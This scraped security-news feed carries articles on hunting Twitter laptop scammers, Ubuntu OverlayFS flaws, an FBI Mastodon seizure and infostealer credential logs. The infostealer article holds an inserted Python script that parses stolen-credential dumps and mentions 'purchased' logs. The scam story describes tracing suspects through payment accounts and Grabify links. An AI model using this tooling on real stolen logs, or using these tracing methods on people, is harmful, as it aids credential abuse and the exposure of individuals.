	After Tim Utzig lost $1,000 to a fraudster who tricked him using a hacked Twitter account, I asked an expert in social engineering and hunting scammers to help. Ultimately, we tracked down the suspected culprits and identified a network of apparent scammers and money mules expertly swindling people out of their savings. This scamming saga shows how fraudsters use social media, build a network of people to operate different payment accounts, and apply effective techniques to bilk their victims.
</p>

<p>
	 
</p>

<p>
	It also shows the additional challenges that blind users like Utzig face on the internet and how they are at higher risk of exploitation by indiscriminate online criminals.
</p>

<h2 aria-level="3" role="heading">
	Inaccessible and Unacceptable
</h2>

<p>
	On May 23, Utzig realized he’d been scammed. He was gearing up for a journalism master’s program at the City University of London and happened to be in the market for a new laptop. By coincidence, someone using the Twitter account of longtime Baltimore sports reporter Roch Kubatko tweeted that they had a new Apple laptop for sale. Utzig trusted Kubatko, whom he’d previously met, and the tweet seemed innocent—and arrived at the perfect moment. So Utzig responded to the tweet with a DM.
</p>

<p>
	 
</p>

<p>
	Utzig uses a screen reader to navigate the internet and social media apps, including Twitter. A sighted person may have observed oddities in the initial tweet and profile, but the screen reader did nothing to alert Utzig about a key fact: Kubatko’s Twitter account had been hacked, and the person he was talking to wasn’t Kubatko.
</p>

<p>
	 
</p>

<p>
	“I feel like people with disabilities as a whole are more susceptible to online fraud—screen readers are just one of the methods used by a population who are visually impaired or blind to assist in using technology,” Utzig says. “You’re going to miss certain visual cues that might signify fraud, such as someone changing their profile picture to something different, and the screen reader won’t pick up on it.”
</p>

<p>
	 
</p>

<p>
	Screen readers also often don’t vocalize misspellings, inaudible grammatical errors, or typography such as fully capitalized words that a sighted person may see as suspicious. And the alternative text on image descriptions, which are manually applied by the individual sharing the content, is the only way a screen reader can describe an image.
</p>

<p>
	 
</p>

<p>
	Then there’s Twitter itself. Check marks are now effectively useless, especially if you’re blind. Since Twitter changed its verification system under Elon Musk’s ownership, the blue tick that used to be a reliable sign of identity can now be obtained by pretty much anyone. A screen reader will call the Twitter Blue check mark “verified” as before, but the blind user can no longer rely on it as much as they once did.
</p>

<p>
	 
</p>

<p>
	Recent moves by Twitter concern accessibility advocates. Last year, Twitter <a href="https://www.wired.com/story/twitter-layoffs-accessibility/" rel="external nofollow">laid off its accessibility team</a>, which was responsible for ensuring the platform was usable for people with disabilities, and restrictions on Twitter’s API <a href="https://www.wired.com/story/twitter-layoffs-accessibility/" rel="external nofollow">broke some tools</a> and resources used by blind people. These changes <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://nfb.org/about-us/press-room/national-federation-blind-moves-away-twitter-establishes-mastodon-server"}' data-offer-url="https://nfb.org/about-us/press-room/national-federation-blind-moves-away-twitter-establishes-mastodon-server" href="https://nfb.org/about-us/press-room/national-federation-blind-moves-away-twitter-establishes-mastodon-server" rel="external nofollow" target="_blank">prompted</a> the National Federation of the Blind to move away from Twitter and create a Mastodon server, which the group says is more friendly and accessible for blind users.
</p>

<p>
	 
</p>

<p>
	“You have people with disabilities scammed, and yet you laid off your whole accessibility team,” Utzig says. “It takes a team to maintain a safe and accessible platform for people with disabilities to use it.”
</p>

<p>
	 
</p>

<p>
	Then, to top it all off, Twitter is now <a href="https://www.wired.com/story/twitter-x-rebrand-elon-musk/" rel="external nofollow">rebranding as X</a>, with the goal of creating an “everything app” that will apparently also process payments and serve as a “bank.” This, despite the fact that just two months before the X rebranding, the very same platform was being used to swindle people out of their hard-earned cash.
</p>

<h2 aria-level="3" role="heading">
	A $1,000 Loss
</h2>

<p>
	After a short conversation with not-Kubatko, the person controlling the account asked Utzig for his phone number to send a payment request via Apple Pay. When Utzig followed up after making a payment, he realized the phone number had blocked his number.
</p>

<p>
	 
</p>

<p>
	Utzig quickly realized he had just paid $1,000 to a criminal. He then reported the account to Twitter. The company did not respond to his requests for help, and the account remained active for days after it was reported as hacked.
</p>

<p>
	 
</p>

<p>
	Utzig turned to the media for help and reached out to a local reporter. When a <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://www.wmar2news.com/matterformallory/blind-grad-student-falls-victim-to-fake-twitter-promo-loses-1-000-for-laptop"}' data-offer-url="https://www.wmar2news.com/matterformallory/blind-grad-student-falls-victim-to-fake-twitter-promo-loses-1-000-for-laptop" href="https://www.wmar2news.com/matterformallory/blind-grad-student-falls-victim-to-fake-twitter-promo-loses-1-000-for-laptop" rel="external nofollow" target="_blank">local Maryland news station</a> contacted Twitter for comment, the company responded with the poop emoji, the response that press requests have been <a href="https://www.npr.org/2023/03/20/1164654551/twitter-poop-emoji-elon-musk" rel="external nofollow">receiving since March 2023</a>. Utzig says that response made the situation feel so much worse—not only had he lost a lot of money, but the platform he used and loved didn’t care at all about the serious personal and financial impact on its users who were victims of crime.
</p>

<p>
	 
</p>

<p>
	In the eight months since Musk bought Twitter in October 2022, the platform has increasingly been home to fraudulent accounts. Users across the site have reported a massive uptick in spammers and scammers tweeting, replying to users, and messaging them directly. There have also been <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://cointelegraph.com/news/open-ai-cto-twitter-hacked-promoting-scam-airdrop"}' data-offer-url="https://cointelegraph.com/news/open-ai-cto-twitter-hacked-promoting-scam-airdrop" href="https://cointelegraph.com/news/open-ai-cto-twitter-hacked-promoting-scam-airdrop" rel="external nofollow" target="_blank">multiple</a> <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://www.bleepingcomputer.com/news/security/kucoins-twitter-account-hacked-to-promote-crypto-scam/"}' data-offer-url="https://www.bleepingcomputer.com/news/security/kucoins-twitter-account-hacked-to-promote-crypto-scam/" href="https://www.bleepingcomputer.com/news/security/kucoins-twitter-account-hacked-to-promote-crypto-scam/" rel="external nofollow" target="_blank">reported</a> <a href="https://www.theguardian.com/technology/2022/dec/26/hack-of-twitter-uk-education-secretary-gillian-keegan-changes-profile-picture-elon-musk" rel="external nofollow">instances</a> of <a data-event-click='{"element":"ExternalLink","outgoingURL":"https://ithacavoice.org/2023/05/assemblymember-kelles-twitter-account-hacked-by-crypto-boosters/"}' data-offer-url="https://ithacavoice.org/2023/05/assemblymember-kelles-twitter-account-hacked-by-crypto-boosters/" href="https://ithacavoice.org/2023/05/assemblymember-kelles-twitter-account-hacked-by-crypto-boosters/" rel="external nofollow" target="_blank">hacked</a>, high-profile accounts distributing fraudulent content.
</p>

<p>
	 
</p>

<p>
	Utzig says his DMs are filled with sketchy accounts either sending spam directly or trying to engage in conversation. The social engineering expert I contacted, who asked to use a pseudonym because they carried out this investigation outside their normal work duties, operates several Twitter accounts both for research and personal use. He—let’s call him Steve—says that in the past few months, the number of malicious accounts he observes on the platform has skyrocketed, especially accounts likely associated with <a href="https://www.wired.com/story/what-is-pig-butchering-scam/" rel="external nofollow">pig butchering</a>. This social engineering threat, which is used to drain people’s bank accounts through bogus investment advice, typically originates on social networks and messaging apps and was recently identified by the US Federal Bureau of Investigation as <a href="https://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/" rel="external nofollow">the most costly online threat</a>, with users reporting billions of dollars in losses in 2022.
</p>

<p>
	 
</p>

<p>
	Social media fraud is part of an ecosystem of online crime that relies on social engineering and trust between users. There are many different kinds of fraud originating on social media, including pig butchering and other financial or cryptocurrency scams, romance scams, and consumer fraud like the kind Utzig experienced.
</p>

<p>
	 
</p>

<p>
	The attack that hit Kubatko appears similar to a series of related hacks that took over accounts of high-profile Twitter users, and which <a href="https://mashable.com/article/twitter-hacker-macbook-scammer" rel="external nofollow">has been ongoing</a> since at least January of this year. The scammers all used similar language and photos about offering laptops for sale. It is not clear whether the hacked accounts and related scams are all operated by the same people. A search of the language used in the tweet suggests the scammers are still active on the platform. Kubatko, who did not respond to WIRED's request for comment, eventually got his Twitter account back and apologized to Utzig when he learned of the financial loss.
</p>

<p>
	 
</p>

<p>
	Different scams require different levels of sophistication; for example, hacking Twitter accounts of high-profile users, many of whom may use multi-factor authentication, is typically more difficult than using said accounts to scam users. It is possible the individuals who swindled Utzig are not the ones who initially hacked Kubatko’s account, but they may have purchased access from the original hacker to use as their scamming platform.
</p>

<h2 aria-level="3" role="heading">
	Trap and Trace
</h2>

<p>
	Steve was enraged that Utzig had been swindled, and offered to help. But all we had was a phone number. So he contacted the number and told the person on the other end that he was interested in buying laptops. Immediately, he received a text from a different number: “Are you looking for laptops?”
</p>

<p>
	 
</p>

<p>
	Throughout the conversation, Steve said he was willing to pay via Bitcoin, Cash App, or Zelle. Bitcoin wallet information is useful because all transactions are stored on the blockchain, and you can <a href="https://www.wired.com/story/tracers-in-the-dark-welcome-to-video-crypto-anonymity-myth/" rel="external nofollow">use it to “follow the money”</a> and identify how much money accounts have made. It’s also possible to cross-reference blockchain accounts with other data sets such as open-source reporting or private threat data to identify related fraudulent activity. Cash App and PayPal are also useful data points because users must provide a lot of personal information including phone numbers, email addresses, usernames, and possibly bank accounts. And Zelle is tied to a bank account, making the information very useful to fraud investigators.
</p>

<p>
	 
</p>

<p>
	Typically, Steve is able to get at least one of these accounts from the threat actors he interacts with—in this case, we got three.
</p>

<p>
	 
</p>

<p>
	By claiming he didn’t have enough money in one of his accounts, and that another was not working, Steve got the scammers to send him links to multiple payment accounts. The accounts all had different usernames, suggesting they belonged to different people. In fact, Steve was able to link the usernames and phone numbers from the payment apps to three different people and their suspected real names. He found LinkedIn profiles; Twitter, Facebook, TikTok, Snap, and Instagram accounts; Poshmark accounts; dating profiles; a Soundcloud; and personal websites. By pivoting on this data and information provided on their various social and public profiles, Steve was then able to link the individuals to physical addresses in the eastern US.
</p>

<p>
	 
</p>

<p>
	Steve also sent the scammers Grabify links to see whether we could collect more data on the users. Grabify is used to identify technical characteristics belonging to a user, such as IP addresses, location data, and “user agents” that indicate what type of device they’re clicking from. In this case, one recipient clicked, and we could see they were using an iPhone on the AT&amp;T network and were apparently located in Ohio, providing a possible estimate of where the user was when they clicked the link.
</p>

<p>
	 
</p>

<p>
	Based on the conversations with the people associated with the various phone numbers and payment accounts, Steve identified at least four individuals involved in this scam ring.
</p>

<p>
	 
</p>

<p>
	At least one person—Utzig’s original scammer—is the suspected organizer of the fraud, with at least one person who appears to work directly with him, according to Steve’s findings. After Steve received a message from the new, unknown number, he asked the original scammer who this person was. That phone number claimed it was a “business partner.” It had initially been possible there was one person using two different phone numbers involved in the scam. But based on subsequent investigations and conversations with both, Steve identified two likely separate individuals belonging to those numbers.
</p>

<p>
	 
</p>

<p>
	The “business partner” sent Steve a Cash App screenshot asking for payment that contained a username, which Steve found associated with multiple social media accounts that included photos. One appeared to have a real name attached.
</p>

<p>
	 
</p>

<p>
	When Steve said he didn’t have enough money in his Cash account, the business partner sent a link to a PayPal account, which used the apparent first and last name of a different real person. The real name and username were linked to multiple social media accounts that all used photos of what appeared to be the same person. Finally, Steve told the business partner his PayPal was not working, and received a name and phone number allegedly belonging to someone’s Zelle account. The business partner claimed this was an “assistant.” By using the details provided, Steve identified yet another individual and their apparent real name who appeared to reside in the same area as our scammers.
</p>

<p>
	 
</p>

<p>
	It is unclear whether the individuals belonging to the Zelle and PayPal accounts knew about the laptop scam or whether they were just “money mules.” These are accounts that receive money from victims and then funnel it to other accounts belonging to the original scammers. Sometimes money mules are unaware they are moving stolen money and may be unwitting participants in the fraud. Indeed, sometimes money mules are recruited by scammers under the guise of legitimate employment.
</p>

<p>
	 
</p>

<p>
	Our investigation resulted in us identifying three payment accounts that were at least associated with the laptop scam, dozens of social media profiles potentially belonging to people involved, and three phone numbers with two different area codes belonging to the same state. While this data could end up being useful to a law enforcement fraud investigation, Steve’s open source intelligence gathering serves as a stark reminder of how easily our digital footprints can be traced back to our real-life existence.
</p>

<h2 aria-level="3" role="heading">
	A Drop in the Bucket
</h2>

<p>
	Local police and the FBI all encourage users to report when they have been victims of online fraud, but victims rarely get the support they need. Utzig filed a police report with the Washington, DC, Metropolitan Police Department, and we reported it to the FBI via the bureau’s Internet Crime Complaint Center. He also contacted his bank and Apple. Unfortunately, using payment apps is the same as sending someone cash. At this point, there is really nothing more Utzig can do—and it’s likely his complaint will just become a drop in a sea of hundreds of thousands of internet crimes reported each year, many of which don’t get any follow-up.
</p>

<p>
	 
</p>

<p>
	We provided the police with details of our own investigation and reported high-confidence malicious payment accounts to the payment platforms to remove them for fraud. As private citizens, we’ve done all we can, but we hope our investigations can help prevent further exploitation by these threat actors.
</p>

<p>
	 
</p>

<p>
	While fraud takes place on pretty much every social media platform, Twitter appears to be hosting more hostile accounts now than it had been prior to the sale last year. And not just from scammers. The company fired much of its Trust and Safety staff in December 2022, and in June, Twitter’s recently appointed head of Trust and Safety <a href="https://www.theregister.com/2023/06/02/twitter_head_of_safety_quits/" rel="external nofollow">exited the company</a>. Without the personnel operating the technical guardrails to prevent widespread harassment, exploitation, and cybercrime, such tactics will likely be allowed to proliferate, making the platform less safe. All this as Musk wants Twitter (sorry, I’m not calling it X) to effectively become a financial institution, which requires more user trust than it has ever enjoyed.
</p>

<p>
	 
</p>

<p>
	Users should be aware of the hallmarks of fraudulent behavior on social media, like receiving messages from strangers, receiving offers to purchase goods and services, and being asked to switch platforms in the middle of a conversation. However, in Utzig’s case, the social platforms themselves could learn a thing or two. Without improvements in screen reading technology and accessibility in general, platforms are enabling exploitation of their more vulnerable users.
</p>

<p>
	 
</p>

<p>
	Working with my friend to help him report this crime also reminded me that security practitioners often forget there are real human beings on the receiving end of cybercrime, and the emotional and mental toll of being a victim can be huge.
</p>

<p>
	 
</p>

<p>
	“Billions of dollars in losses” sounds bad. Your friend losing a lot of their savings and feeling violated and betrayed by platforms and people he trusted feels a lot worse.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/twitter-laptop-scam-hunters/" rel="external nofollow">Source</a>
</p>

<p>
	 
</p>

<p>
	(May require free registration to view)
</p>
]]></description><guid isPermaLink="false">17346</guid><pubDate>Wed, 26 Jul 2023 20:34:29 +0000</pubDate></item><item><title>Almost 40% of Ubuntu users vulnerable to new privilege elevation flaws</title><link>https://nsaneforums.com/news/security-privacy-news/almost-40-of-ubuntu-users-vulnerable-to-new-privilege-elevation-flaws-r17345/</link><description><![CDATA[<p>
	Two Linux vulnerabilities introduced recently into the Ubuntu kernel create the potential for unprivileged local users to gain elevated privileges on a massive number of devices.
</p>

<p>
	 
</p>

<p>
	Ubuntu is one of the most widely used Linux distributions, especially popular in the U.S., having an approximate user base of over 40 million.
</p>

<p>
	 
</p>

<p>
	Two flaws, tracked as CVE-2023-32629 and CVE-2023-2640 and discovered by <a href="https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability" rel="external nofollow" target="_blank">Wiz's researchers</a> S. Tzadik and S. Tamari, were recently introduced into the operating system, impacting roughly 40% of Ubuntu's userbase.
</p>

<p>
	 
</p>

<p>
	<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-2640" rel="external nofollow" target="_blank">CVE-2023-2640</a> is a high-severity (CVSS v3 score: 7.8) vulnerability in the Ubuntu Linux kernel caused by inadequate permission checks allowing a local attacker to gain elevated privileges.
</p>

<p>
	 
</p>

<p>
	<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-35929" rel="external nofollow" target="_blank">CVE-2023-32629</a> is a medium-severity (CVSS v3 score: 5.4) flaw in the Linux kernel memory management subsystem, where a race condition when accessing VMAs may lead to use-after-free, allowing a local attacker to perform arbitrary code execution.
</p>

<p>
	 
</p>

<p>
	The two analysts found the problems after discovering discrepancies between how the OverlayFS module is implemented in the Ubuntu kernel and in the upstream Linux kernel.
</p>

<p>
	 
</p>

<p>
	OverlayFS is a union mount filesystem implementation targeted by threat actors many times in the past due to allowing unprivileged access via user namespaces and being plagued by easily exploitable bugs.
</p>

<p>
	 
</p>

<p>
	Ubuntu, as one of the distributions using OverlayFS, had implemented custom changes to its OverlayFS module in 2018, which were generally safe.
</p>

<p>
	 
</p>

<p>
	However, in 2019 and 2022, the Linux kernel project made its own modifications to the module, which conflicted with Ubuntu's changes.
</p>

<p>
	 
</p>

<p>
	The widely used distribution recently adopted the upstream code containing these changes, and the conflicts with its own modifications introduced the two flaws.
</p>

<p>
	 
</p>

<p>
	Unfortunately, the risk of exploitation is imminent, as PoCs for the two flaws have been publicly available for a long time.
</p>

<p>
	 
</p>

<p>
	"Both vulnerabilities are unique to Ubuntu kernels since they stemmed from Ubuntu's individual changes to the OverlayFS module," warned the Wiz researchers.
</p>

<p>
	 
</p>

<p>
	"Weaponized exploits for these vulnerabilities are already publicly available given old exploits for past OverlayFS vulnerabilities work out of the box without any changes."
</p>

<p>
	 
</p>

<p>
	It should be noted that the two highlighted flaws only impact Ubuntu, and any other Linux distribution, including Ubuntu forks, not using custom modifications of the OverlayFS module should be safe.
</p>

<p>
	 
</p>

<p>
	Ubuntu has released a <a href="https://ubuntu.com/security/notices/USN-6250-1" rel="external nofollow" target="_blank">security bulletin</a> about the issues and six more vulnerabilities addressed in the latest version of the Ubuntu Linux kernel and has made fixing updates available.
</p>

<p>
	 
</p>

<p>
	Users who don't know how to reinstall and activate third-party kernel modules are recommended to perform the update via their package manager, which should take care of all dependencies and post-install configurations. 
</p>

<p>
	 
</p>

<p>
	A reboot is required after installing the updates for the Linux kernel update to take effect on Ubuntu.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/almost-40-percent-of-ubuntu-users-vulnerable-to-new-privilege-elevation-flaws/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17345</guid><pubDate>Wed, 26 Jul 2023 20:31:41 +0000</pubDate></item><item><title>Watch Out, Fediverse Users: The FBI Can Seize a Mastodon Server</title><link>https://nsaneforums.com/news/security-privacy-news/watch-out-fediverse-users-the-fbi-can-seize-a-mastodon-server-r17335/</link><description><![CDATA[<p>
	<span style="font-size:22px;">The FBI's seizure of a Mastodon server copy is a wakeup call to users of the decentralized social network, according to the Electronic Frontier Foundation.</span>
</p>

<p>
	 
</p>

<p>
	Usually, the feds will subpoena a tech company to obtain data on social media users. But in the case of Mastodon—a decentralized social network—the FBI can apparently straight up seize an entire server copy containing thousands of users' data.
</p>

<p>
	 
</p>

<p>
	The Electronic Frontier Foundation (EFF) is warning about the potential threat after the FBI seized a Mastodon server backup belonging to an "anarchist/anti-colonial" group called Kolektiva.
</p>

<p>
	 
</p>

<p>
	The seizure occurred in May, but went largely unreported. The FBI raided a home belonging to a Kolektiva admin as part of an investigation into a local protest, the group said about six weeks after the incident.
</p>

<p>
	 
</p>

<p>
	During the raid, the FBI seized a server copy for Kolektiva’s Mastodon instance, which currently has over 8,000 active users. The database contained user account information, including email addresses, possible IP addresses associated with user accounts, and hashed user passwords. In addition, the FBI acquired a copy of the Kolektiva.social database in an unencrypted state since the raid happened while the admin was troubleshooting an issue.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="07HPLxIUAUB1QBV4TxhEHaE-2.fit_lim.size_8" class="ipsImage" data-ratio="75.10" height="479" width="720" src="https://i.pcmag.com/imagery/articles/07HPLxIUAUB1QBV4TxhEHaE-2.fit_lim.size_845x.jpg" />
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><em>(Credit: Getty Images)</em></span>
</p>

<p style="text-align:center;">
	 
</p>

<p>
	The EFF says this shows the FBI can sweep up data on numerous people while investigating a single case when it comes to Mastodon. The decentralized social network isn’t controlled by a large corporation out to monetize your data. Instead, anyone can launch a Mastodon server in their home and connect it to others to create a federated social network. 
</p>

<p>
	 
</p>

<p>
	But the same decentralized nature makes it easier for the feds to swoop in. The EFF adds: "Many fediverse instances, such as Kolektiva, are focused on serving marginalized communities who are disproportionately targeted by law enforcement… Yet this raid put the thousands of users this instance served into a terrible situation.”  
</p>

<p>
	 
</p>

<p>
	The EFF is now urging both users and Mastodon server operators to take precautions to counter potential FBI seizures. “This story should also be a wake-up call for the thousands of hosts in the growing decentralized web: you have to have your users’ backs too,” the group says. 
</p>

<p>
	 
</p>

<p>
	The FBI didn’t immediately respond to a request for comment. So it’s unclear if the agency is taking any measures to avoid sifting through user data that's separate from its investigation. In the meantime, the EFF recommends that Mastodon server operators collect as little data as possible.
</p>

<p>
	 
</p>

<p>
	Mastodon users should also carefully scrutinize the servers they join, and urge the operators to uphold strong privacy safeguards. 
</p>

<p>
	 
</p>

<p>
	“Making these commitments binding in the terms of service is not only a good idea, it can help the host fight back against overbroad law enforcement requests and can support later motions by defendants to exclude the evidence,” the EFF adds.
</p>

<p>
	 
</p>

<p>
	Meanwhile, Eugen Rochko, the founder of Mastodon, pointed out: "The FBI performed a raid on one of the admins of kolektiva.social for unrelated charges, and that admin had a backup of the kolektiva.social database on one of their digital devices at home (not a recommended practice, for what it's worth). That Mastodon server is still up. Of course the FBI can take down a Mastodon server in their jurisdiction though, just like they can do with any other website. There's nothing special about Mastodon in that regard, just that taking down one server doesn't affect the rest of the network."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcmag.com/news/watch-out-fediverse-users-the-fbi-can-seize-a-mastodon-server" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">17335</guid><pubDate>Wed, 26 Jul 2023 15:56:36 +0000</pubDate></item><item><title>Thousands of corporate logins have been taken by info-stealing malware</title><link>https://nsaneforums.com/news/security-privacy-news/thousands-of-corporate-logins-have-been-taken-by-info-stealing-malware-r17334/</link><description><![CDATA[<p>
	<span style="font-size:22px;">They're being sold off on the black market</span>
</p>

<p>
	 
</p>

<p>
	Hundreds of thousands of login credentials and other information needed to access business applications used by major corporations around the world have been found circulating on the dark web. 
</p>

<p>
	 
</p>

<p>
	This is according to a new report from cybersecurity researchers at Flare, who analyzed roughly 20 million infostealer logs being sold on the dark web and in cybercriminals’ Telegram channels.
</p>

<p>
	 
</p>

<p>
	Logs are packages of information stolen in malware attacks and contain things like passwords stored in browsers, email data, messages from instant messaging platforms, cryptocurrency wallet information, and more. 
</p>

<p>
	 
</p>

<p>
	In its analysis, Flare found some 370,000 logs containing credentials for Salesforce, HubSpot, QuickBooks, AWS, DocuSign and other major business applications used by some of the biggest corporations in the world, each of which has hundreds of thousands of users. AWS users were the biggest victims, with almost 200,000 AWS Console credentials on sale, followed by roughly 65,000 DocuSign and CRM credentials and some 23,000 Salesforce credentials. 
</p>
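<p>
	Flare’s per-application counts come from matching the URL field of each saved browser credential against the login hosts of the business applications. The Python script below is an added example, not Flare’s tooling or code from the article: it does the same triage over a constructed stealer log in the Passwords.txt layout many stealer families use (URL/Username/Password/Application blocks separated by a rule of equals signs). The host lists, the sample records and the corp.example domain are assumptions made for the example. It matches on the host rather than on a substring of the URL, so a phishing look-alike of salesforce.com is not counted as a Salesforce credential, and it can restrict the count to one company’s own addresses.
</p>

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Login hosts for the business applications the report names. Matching on
# the host (exact or subdomain), not on a substring of the URL, keeps a
# phishing look-alike such as salesforce.com.evil.example out of the count.
# These host lists are assumptions for the example, not Flare's rules.
APP_HOSTS = {
    "AWS Console": ("signin.aws.amazon.com", "console.aws.amazon.com"),
    "Salesforce": ("login.salesforce.com", "salesforce.com"),
    "HubSpot": ("app.hubspot.com", "hubspot.com"),
    "QuickBooks": ("qbo.intuit.com", "accounts.intuit.com"),
    "DocuSign": ("account.docusign.com", "docusign.com"),
    "OpenAI": ("chat.openai.com", "platform.openai.com", "auth0.openai.com"),
}

# Constructed sample in the Passwords.txt layout many stealer families use
# (one saved browser credential per block, blocks separated by a rule of '=').
SAMPLE_LOG = """\
URL: https://signin.aws.amazon.com/console
Username: ops@corp.example
Password: Hunter2!
Application: Google Chrome
===============
URL: https://login.salesforce.com/
Username: sales@corp.example
Password: Q1pipeline
Application: Microsoft Edge
===============
URL: https://salesforce.com.evil.example/login
Username: sales@corp.example
Password: Q1pipeline
Application: Google Chrome
===============
URL: https://chat.openai.com/auth/login
Username: dev@corp.example
Password: gpt4me
Application: Google Chrome
===============
URL: https://forum.example.org/login
Username: someone@mail.example
Password: abc
Application: Firefox
"""

RECORD_SEP = re.compile(r"^=+\s*$", re.M)
FIELD = re.compile(r"^(URL|Username|Password|Application):\s*(.*)$", re.M)


def parse_records(text):
    """Split a Passwords.txt-style dump into dicts keyed by lower-cased field name."""
    records = []
    for chunk in RECORD_SEP.split(text):
        fields = {k.lower(): v.strip() for k, v in FIELD.findall(chunk)}
        if "url" in fields:
            records.append(fields)
    return records


def host_matches(host, pattern):
    """True if host is pattern itself or a subdomain of it."""
    return host == pattern or host.endswith("." + pattern)


def classify_app(url):
    """Name of the business application a saved credential belongs to, or None."""
    host = (urlparse(url).hostname or "").lower()
    for app, hosts in APP_HOSTS.items():
        if any(host_matches(host, h) for h in hosts):
            return app
    return None


def triage(text, corp_domain=None):
    """Count saved credentials per application.

    With corp_domain set, only records whose username is an address at that
    domain are counted, which is how you would check one company's exposure.
    """
    counts = Counter()
    for rec in parse_records(text):
        user = rec.get("username", "").lower()
        if corp_domain and not user.endswith("@" + corp_domain.lower()):
            continue
        app = classify_app(rec["url"])
        if app:
            counts[app] += 1
    return counts


if __name__ == "__main__":
    for app, n in triage(SAMPLE_LOG).most_common():
        print(f"{app}: {n}")
```

<p>
	Run it as-is to see the per-app counts for the sample, or feed a real Passwords.txt to parse_records to triage a purchased or recovered log. Stealer families vary the field names and separators, so the two regular expressions are the part to adapt; the host matching and the username filter stay the same.
</p>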

<p>
	 
</p>

<p>
	The researchers also found more than 200,000 stealer logs with OpenAI credentials, suggesting that these might leak proprietary information, internal business strategies, or source code, BleepingComputer reports. 
</p>

<p>
	 
</p>

<p>
	Roughly three-quarters of these logs (74%) were posted on Telegram channels, with the remainder sold on Russian-speaking dark web marketplaces. 
</p>

<p>
	 
</p>

<p>
	"Logs containing corporate access were over-represented on Russian Market and VIP Telegram channels, indicating that the methods attackers use to harvest logs may incidentally or intentionally have more corporate targeting," describes the Flare report.
</p>

<p>
	 
</p>

<p>
	"Additionally, public Telegram channels may deliberately post lower value logs, saving high-value logs for paying customers."
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>Analysis: Why does it matter?</strong></span>
</p>

<p>
	<br />
	There are very few things as valuable in the cybercriminal world as login credentials for business applications used by large corporations. They are highly valued because they grant access to sensitive corporate data, including employee information, customer information, business secrets, future plans, and more. That access in turn lets attackers deploy malware or ransomware, exfiltrate data, or conduct cyber espionage. The data obtained this way can later be sold on the black market for significant profit, or be leveraged in a ransom demand. 
</p>

<p>
	 
</p>

<p>
	"Based on evidence from the dark web forum Exploit in, we rate it as highly likely that initial access brokers are using stealer logs as a principal source to gain an initial foothold to corporate environments that can then be auctioned off on top-tier dark web forums," Flare researcher Eric Clay said.
</p>

<p>
	 
</p>

<p>
	Many cybercriminal groups focus solely on breaking into corporate environments and business endpoints, then sell that access to peers who use it for second-stage attacks. These groups are called “initial access brokers” and rarely engage in information stealing themselves; those that do typically deploy some of the most widely used info-stealing malware, such as RedLine Stealer, Aurora, or Vidar. 
</p>

<p>
	 
</p>

<p>
	These tools can be rented out, significantly lowering the barrier for entry and making life a lot more difficult for IT teams looking to keep their virtual premises safe. 
</p>

<p>
	 
</p>

<p>
	Employees’ use of personal devices to access company files and systems is also a major risk factor. Many of these endpoints are shared with other household members who don’t always keep security in mind and end up downloading dubious software, cracks, loaders, and torrent files riddled with malware. 
</p>

<p>
	 
</p>

<p>
	To keep their premises safe, businesses should deploy password managers, enforce multi-factor authentication (MFA), run firewalls, and educate their employees on the dangers of using unvetted software and visiting risky websites. 
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>What have others said about credential theft? </strong></span>
</p>

<p>
	<br />
	Password sharing is another bad practice that puts a lot of companies in harm’s way. For example, a 2021 survey in the U.S. found that a third (34%) of adults shared their passwords with coworkers, which translates to some 30 million Americans. Of the 1,500 adults polled for the survey, almost a quarter (22%) admitted reusing the same password on multiple accounts, while just 12% said they used a password manager. 
</p>

<p>
	 
</p>

<p>
	Others, like the Head of IT at Confidential, Jay Leaf-Clark, argue that company security isn't just an IT problem - it’s a work culture problem.
</p>

<p>
	“Fostering a strong security culture at work is key, which means empowering employees to do their part in keeping company data secure and making it easy to stay on top of—with the right tools,” he said.
</p>

<p>
	 
</p>

<p>
	He also argues that people overestimate their security habits. Citing various surveys, he said that 69% of people graded themselves As and Bs for protecting their online accounts, while 65% reused their passwords for multiple accounts. “On average, employees reuse passwords across 16 work accounts,” he added.
</p>

<p>
	 
</p>

<p>
	Cybersecurity experts have long warned of the dangers of social engineering and phishing. By being careless and overly trusting, many workers open email attachments and click links on social media without thinking about the consequences, often causing major damage to their employer.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.techradar.com/pro/thousands-of-corporate-logins-have-been-taken-by-info-stealing-malware" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">17334</guid><pubDate>Wed, 26 Jul 2023 15:53:43 +0000</pubDate></item><item><title>AMD confirms firmware update for Ryzen 3000, 4000, 5000, 7000 CPUs vulnerable to Zenbleed</title><link>https://nsaneforums.com/news/security-privacy-news/amd-confirms-firmware-update-for-ryzen-3000-4000-5000-7000-cpus-vulnerable-to-zenbleed-r17312/</link><description><![CDATA[<p>
	AMD's Zen 2-based CPUs, which include popular chips like the Ryzen 5 3600, 3700X, and more, are vulnerable to Zenbleed, a flaw that behaves like a use-after-free, except that the resource being reused is a physical vector register inside the CPU rather than heap memory. AMD has updated its security bulletin and published a new advisory with the ID AMD-SB-7008.
</p>

<p>
	 
</p>

<p>
	For desktops, AMD's Ryzen 3000 series (Matisse) and Ryzen 4000/4000G series (Renoir) are on the list; for mobile, the list includes Ryzen 5000 (Lucienne), Ryzen 4000 (Renoir), and Ryzen 7020 (Mendocino).
</p>

<p>
	 
</p>

<p>
